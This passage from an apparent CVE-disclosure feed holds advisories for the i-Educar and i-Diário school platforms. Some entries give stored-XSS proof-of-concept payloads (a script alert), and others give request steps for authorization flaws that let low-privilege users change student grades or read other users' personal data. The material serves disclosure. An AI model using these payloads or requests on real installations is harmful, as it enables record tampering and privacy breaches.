/p/cve-2025-8920/image_hu_b173c6ab2683ec99.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="236" data-flex-basis="568px" /></p> <p><img src="/p/cve-2025-8920/image-1.png" width="1366" height="523" srcset="/p/cve-2025-8920/image-1_hu_697984d0ff1c654e.png 480w, /p/cve-2025-8920/image-1_hu_26a8359046aafdd9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="626px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8920.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8920.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/f%C3%AAmartins/" target="_blank" rel="noopener" >Fernanda Martins</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 13 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8786/ https://www.cvehunters.com/p/cve-2025-8786/ <h2 id="cve-2025-8786-multiples-cross-site-scripting-xss-stored-in-endpoint-registros-de-conteudos-por-areas-de-conhecimentoid">CVE-2025-8786: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8786" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8786</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Registro de atividades</code> and <code>Conteúdos</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-8786-multiples-cross-site-scripting-xss-stored-in-endpoint-registros-de-conteudos-por-areas-de-conhecimentoid">CVE-2025-8786: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8786" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8786</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Registro de atividades</code> and <code>Conteúdos</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/registros-de-conteudos-por-areas-de-conhecimento/[ID]</code></p> <p>Parameters: <code>Registro de atividades</code> and <code>Conteúdos</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Registro de atividades</code> and <code>Conteúdos</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8786/image.png" width="1243" height="915" srcset="/p/cve-2025-8786/image_hu_3e27598d3abe3ea1.png 480w, /p/cve-2025-8786/image_hu_bce7c67fb3add2c9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="135" data-flex-basis="326px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8787/ https://www.cvehunters.com/p/cve-2025-8787/ <h2 id="cve-2025-8787-multiples-cross-site-scripting-xss-stored-in-endpoint-registros-de-conteudos-por-disciplinaid">CVE-2025-8787: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/registros-de-conteudos-por-disciplina/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8787" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8787</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/registros-de-conteudos-por-disciplina/[ID]</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Registro de atividades</code> and <code>Conteúdos</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-8787-multiples-cross-site-scripting-xss-stored-in-endpoint-registros-de-conteudos-por-disciplinaid">CVE-2025-8787: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/registros-de-conteudos-por-disciplina/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8787" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8787</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/registros-de-conteudos-por-disciplina/[ID]</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Registro de atividades</code> and <code>Conteúdos</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/registros-de-conteudos-por-disciplina/[ID]</code></p> <p>Parameters: <code>Registro de atividades</code> and <code>Conteúdos</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Registro de atividades</code> and <code>Conteúdos</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8787/image.png" width="1478" height="1024" srcset="/p/cve-2025-8787/image_hu_af95e2fb9a2d3cce.png 480w, /p/cve-2025-8787/image_hu_71862e9971386bbb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="144" data-flex-basis="346px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8787.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8787.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8788/ https://www.cvehunters.com/p/cve-2025-8788/ <h2 id="cve-2025-8788-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-aula-por-areas-de-conhecimentoid">CVE-2025-8788: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8788" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8788</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Parecer</code>, <code>Conteúdos</code> and <code>Objetivos</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-8788-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-aula-por-areas-de-conhecimentoid">CVE-2025-8788: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8788" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8788</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Parecer</code>, <code>Conteúdos</code> and <code>Objetivos</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/planos-de-aula-por-areas-de-conhecimento.(ID)</code></p> <p>Parameters: <code>Parecer</code>, <code>Conteúdos</code> and <code>Objetivos</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Parecer</code>, <code>Conteúdos</code> and <code>Objetivos</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8788/image.png" width="1038" height="848" srcset="/p/cve-2025-8788/image_hu_9b8b7d2a254f8182.png 480w, /p/cve-2025-8788/image_hu_650bf2e02f0977a4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="122" data-flex-basis="293px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8788.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8788.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8789/ https://www.cvehunters.com/p/cve-2025-8789/ <h2 id="cve-2025-8789-broken-function-level-authorization-bfla-allows-unauthorized-users-to-alter-student-grades">CVE-2025-8789: Broken Function Level Authorization (BFLA) allows unauthorized users to alter student grades </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8789" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8789</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An API endpoint in i-Educar 2.9.0 is vulnerable to Broken Function Level Authorization (BFLA). An unauthorized user is able to modify student grades by directly accessing the <code>/module/Api/Diario</code> endpoint, bypassing permission controls. This leads to severe integrity issues, where anyone with access to the API format can tamper with academic records.</p><h2 id="cve-2025-8789-broken-function-level-authorization-bfla-allows-unauthorized-users-to-alter-student-grades">CVE-2025-8789: Broken Function Level Authorization (BFLA) allows unauthorized users to alter student grades </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8789" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8789</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An API endpoint in i-Educar 2.9.0 is vulnerable to Broken Function Level Authorization (BFLA). An unauthorized user is able to modify student grades by directly accessing the <code>/module/Api/Diario</code> endpoint, bypassing permission controls. This leads to severe integrity issues, where anyone with access to the API format can tamper with academic records.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The endpoint <code>/module/Api/Diario</code> does not enforce proper authorization checks to validate whether the calling user has the right to alter student grades. Even a user without any profile or assigned permissions can successfully submit a request and change the grades of students in the system.</br>There is no validation of session roles or associated permissions before executing sensitive academic actions.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>1 - Create a new user with no privileges:</li></ul></p> <p><img src="/p/cve-2025-8789/image.png" width="1265" height="845" srcset="/p/cve-2025-8789/image_hu_12fb6a5884d4c7fe.png 480w, /p/cve-2025-8789/image_hu_1cd7def43b89cd3b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="149" data-flex-basis="359px" /></p> <p style="text-align: justify;"><ul><li>2 - Prepare a request to the <code>/module/Api/Diario</code> endpoint with the data to submit a student grade, using the low privillege user cookie then send the request:</li></ul></p> <p><img src="/p/cve-2025-8789/image-1.png" width="1907" height="706" srcset="/p/cve-2025-8789/image-1_hu_4233548f4a00bb09.png 480w, /p/cve-2025-8789/image-1_hu_e6aa64e535ea83af.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="270" data-flex-basis="648px" /></p> <p>Translated result from pt-br to en:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">"oper"</span><span class="o">:</span> <span class="s2">"post"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">"resource"</span><span class="o">:</span> <span class="s2">"grades"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">"msgs"</span><span class="o">:</span> <span class="p">[{</span> </span></span><span class="line"><span class="cl"> <span class="s2">"msg"</span><span class="o">:</span> <span class="s2">"Grades successfully posted!"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">"type"</span><span class="o">:</span> <span class="s2">"success"</span> </span></span><span class="line"><span class="cl"> <span class="p">}],</span> </span></span><span class="line"><span class="cl"> <span class="s2">"any_error_msg"</span><span class="o">:</span> <span class="kc">false</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="impact">Impact </h2><p style="text-align: justify;">This is a Broken Function Level Authorization (BFLA) vulnerability, as categorized by OWASP API Security Top 10 (2023) - API4. The consequences include: <ul> <li>Tampering with academic data without authorization.</li> <li>Loss of data integrity in school records.</li> <li>Potential legal and reputational damage for educational institutions.</li> </ul> </p> <h2 id="reference">Reference </h2><p><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8789.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8789.md</a></strong></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8790/ https://www.cvehunters.com/p/cve-2025-8790/ <h2 id="cve-2025-8790-broken-object-level-authorization-bola-in-pessoa-api-endpoint-allows-unauthorized-access-to-other-users-data">CVE-2025-8790: Broken Object Level Authorization (BOLA) in pessoa API Endpoint Allows Unauthorized Access to Other Users Data </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8790" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8790</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the i-educar 2.8 and 2.9 API, allowing any authenticated low-privileged user to access sensitive information from other users by manipulating the <code>id</code> parameter in the <code>pessoa</code> resource endpoint.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The endpoint <code>/module/Api/pessoa</code> lacks proper authorization checks to ensure that the authenticated user is only able to access their own data.</br></br>By altering the id parameter in the following request, any authenticated user can retrieve information about other users:</br></br><code>GET /module/Api/pessoa?&oper=get&resource=pessoa&id=1 HTTP/1.1</code></p><h2 id="cve-2025-8790-broken-object-level-authorization-bola-in-pessoa-api-endpoint-allows-unauthorized-access-to-other-users-data">CVE-2025-8790: Broken Object Level Authorization (BOLA) in pessoa API Endpoint Allows Unauthorized Access to Other Users Data </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8790" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8790</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the i-educar 2.8 and 2.9 API, allowing any authenticated low-privileged user to access sensitive information from other users by manipulating the <code>id</code> parameter in the <code>pessoa</code> resource endpoint.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The endpoint <code>/module/Api/pessoa</code> lacks proper authorization checks to ensure that the authenticated user is only able to access their own data.</br></br>By altering the id parameter in the following request, any authenticated user can retrieve information about other users:</br></br><code>GET /module/Api/pessoa?&oper=get&resource=pessoa&id=1 HTTP/1.1</code></p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>1. Authenticate as a non-privileged user (e.g., student, professor).</li></ul></p> <p><img src="/p/cve-2025-8790/image.png" width="1844" height="712" srcset="/p/cve-2025-8790/image_hu_48fc6d25edbda623.png 480w, /p/cve-2025-8790/image_hu_74ee304be9e6fa02.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="258" data-flex-basis="621px" /></p> <p style="text-align: justify;"><ul><li>2. Send the following request targeting id=1 user:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Api/pessoa?&oper=get&resource=pessoa&id=1 HTTP/1.1 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=VALID_SESSION_COOKIE } </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8790/image-1.png" width="1692" height="722" srcset="/p/cve-2025-8790/image-1_hu_c84dc371c6bf6535.png 480w, /p/cve-2025-8790/image-1_hu_320efcd74fb43e61.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="234" data-flex-basis="562px" /></p> <p style="text-align: justify;"><ul><li>3. Observe that user data for id=1 is returned, even if the logged-in user is not authorized to access that profile:</li></ul></p> <p><img src="/p/cve-2025-8790/image-2.png" width="340" height="205" srcset="/p/cve-2025-8790/image-2_hu_d9c8057967bbba47.png 480w, /p/cve-2025-8790/image-2_hu_ab2516e3d6f6df9a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="165" data-flex-basis="398px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to: <ul> <li>Unauthorized access to sensitive PII;</li> <li>Violation of data protection laws (e.g., LGPD, GDPR);</li> <li>Potential abuse of user data or impersonation;</li> <li>User enumeration.</li> </ul> </p> <h2 id="reference">Reference </h2><p><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8790.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8790.md</a></strong></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 10 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8784/ https://www.cvehunters.com/p/cve-2025-8784/ <h2 id="cve-2025-8784-cross-site-scripting-xss-stored-endpoint-funcionario_vinculo_cadphp-parameter-nome">CVE-2025-8784: Cross-Site Scripting (XSS) Stored endpoint <code>funcionario_vinculo_cad.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8784" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8784</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>funcionario_vinculo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>funcionario_vinculo_cad.php</code></p><h2 id="cve-2025-8784-cross-site-scripting-xss-stored-endpoint-funcionario_vinculo_cadphp-parameter-nome">CVE-2025-8784: Cross-Site Scripting (XSS) Stored endpoint <code>funcionario_vinculo_cad.php</code> parameter <code>nome</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8784" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8784</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>funcionario_vinculo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>funcionario_vinculo_cad.php</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS2'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8784/image-1.png" width="816" height="785" srcset="/p/cve-2025-8784/image-1_hu_65d849fc4a441b59.png 480w, /p/cve-2025-8784/image-1_hu_8e8bc4b51d611da8.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="103" data-flex-basis="249px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" 